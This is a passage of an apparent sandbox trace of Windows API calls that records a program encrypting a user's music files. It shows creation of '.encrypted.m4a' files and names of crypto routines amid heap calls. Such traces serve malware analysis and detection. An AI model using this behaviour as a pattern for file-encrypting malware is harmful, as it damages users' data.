dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0039.014] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc")) returned 0x10 [0039.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0039.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0039.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\gr_-.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0039.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.015] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0039.015] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.015] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0039.015] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0039.016] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.016] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x3c1a, lpOverlapped=0x0) returned 1 [0039.017] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c1a) returned 0xac0018 [0039.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0039.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c1a) returned 0xac3c40 [0039.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.018] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c1a) returned 0xac0018 [0039.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.018] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0039.019] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.019] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c1a) returned 0xac0018 [0039.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0039.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889970 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c1a) returned 0xac7868 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0039.021] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0039.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0039.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.021] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3a8 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.021] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0039.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.022] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.023] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.024] HeapFree (in: 